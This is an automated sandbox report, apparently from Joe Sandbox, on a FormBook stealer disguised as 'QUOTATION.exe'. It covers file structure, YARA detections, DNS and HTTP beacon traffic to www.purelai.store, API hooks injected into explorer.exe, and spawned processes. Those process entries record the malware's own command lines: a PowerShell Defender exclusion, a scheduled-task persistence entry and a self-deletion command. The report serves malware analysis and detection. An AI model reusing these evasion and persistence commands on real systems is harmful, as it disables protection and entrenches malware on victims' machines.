                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000xa62d00xa6400False0.913712993421data7.84988973797IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0xaa0000x6400x800False0.34619140625data3.51366794109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0xaa0900x3b0data
                  RT_MANIFEST0xaa4500x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyrightCopyright Mogens Heller Grabe 2010
                  Assembly Version1.0.0.0
                  InternalNameAppDomainInitializerIn.exe
                  FileVersion1.0.0.0
                  CompanyNameMookid8000
                  LegalTrademarks
                  Comments
                  ProductNameTypedFactoryTjek
                  ProductVersion1.0.0.0
                  FileDescriptionTypedFactoryTjek
                  OriginalFilenameAppDomainInitializerIn.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 19:55:56.321921110 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.511965990 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.512080908 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.512226105 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.701594114 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711364031 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711425066 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711478949 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711519003 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711551905 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711554050 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.711579084 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711585999 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.711674929 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.712698936 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.902086973 CET8049786208.51.62.42192.168.2.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 19:55:56.287297010 CET5213053192.168.2.38.8.8.8
                  Dec 2, 2021 19:55:56.309746027 CET53521308.8.8.8192.168.2.3
                  Dec 2, 2021 19:56:39.064629078 CET5652753192.168.2.38.8.8.8
                  Dec 2, 2021 19:56:39.208022118 CET53565278.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Dec 2, 2021 19:55:56.287297010 CET192.168.2.38.8.8.80x7ccdStandard query (0)www.purelai.storeA (IP address)IN (0x0001)
                  Dec 2, 2021 19:56:39.064629078 CET192.168.2.38.8.8.80x35ecStandard query (0)www.archedbeautynw.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Dec 2, 2021 19:55:56.309746027 CET8.8.8.8192.168.2.30x7ccdNo error (0)www.purelai.storepurelai.storeCNAME (Canonical name)IN (0x0001)
                  Dec 2, 2021 19:55:56.309746027 CET8.8.8.8192.168.2.30x7ccdNo error (0)purelai.store208.51.62.42A (IP address)IN (0x0001)
                  Dec 2, 2021 19:56:39.208022118 CET8.8.8.8192.168.2.30x35ecNo error (0)www.archedbeautynw.com192.185.0.218A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.purelai.store

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349786208.51.62.4280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 2, 2021 19:55:56.512226105 CET7959OUTGET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1
                  Host: www.purelai.store
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 19:55:56.711364031 CET7960INHTTP/1.1 200 OK
                  Date: Thu, 02 Dec 2021 18:55:56 GMT
                  Server:
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  X-Content-Type-Options: nosniff
                  Content-Length: 5855
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 36 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 36 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 37 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 62 72 20 2f 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 39 43 38 39 35 30 3b 20 22 3e 20 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 20 3c 2f 64 69 76 3e 20 20 3c 62 72 20 2f 3e 3c 64 69 76 20 69 64 3d 22 61 72 74 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 62 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <title>purelai.store</title> <link rel="stylesheet" href="images/style.css" type="text/css" media="screen" /> ...[if IE 6]><link rel="stylesheet" href="images/style.ie6.css" type="text/css" media="screen" /><![endif]--> ...[if IE 7]><link rel="stylesheet" href="images/style.ie7.css" type="text/css" media="screen" /><![endif]--> <script type="text/javascript" src="images/script.js"></script></head><body><br /><div style=" text-align:center; font-size:30px; color: #9C8950; "> purelai.store </div> <br /><div id="art-main"> <div class="art-sheet"> <div class="art-sheet-tl"></div> <div class="art-sheet-tr"></div> <div class="art-sheet-bl"></div> <div cla


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE1

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:19:54:31
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase:0x360000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:19:54:34
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Imagebase:0x940000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:19:54:34
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:19:54:35
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Imagebase:0xf0000
                  File size:185856 bytes
                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:19:54:36
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:19:54:37
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase:0x330000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:19:54:39
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase:0x520000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:19:54:42
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff720ea0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Start time:19:55:05
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                  Imagebase:0x990000
                  File size:851968 bytes
                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:19:55:17
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\NETSTAT.EXE
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                  Imagebase:0x1050000
                  File size:32768 bytes
                  MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Start time:19:55:19
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:19:55:20
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >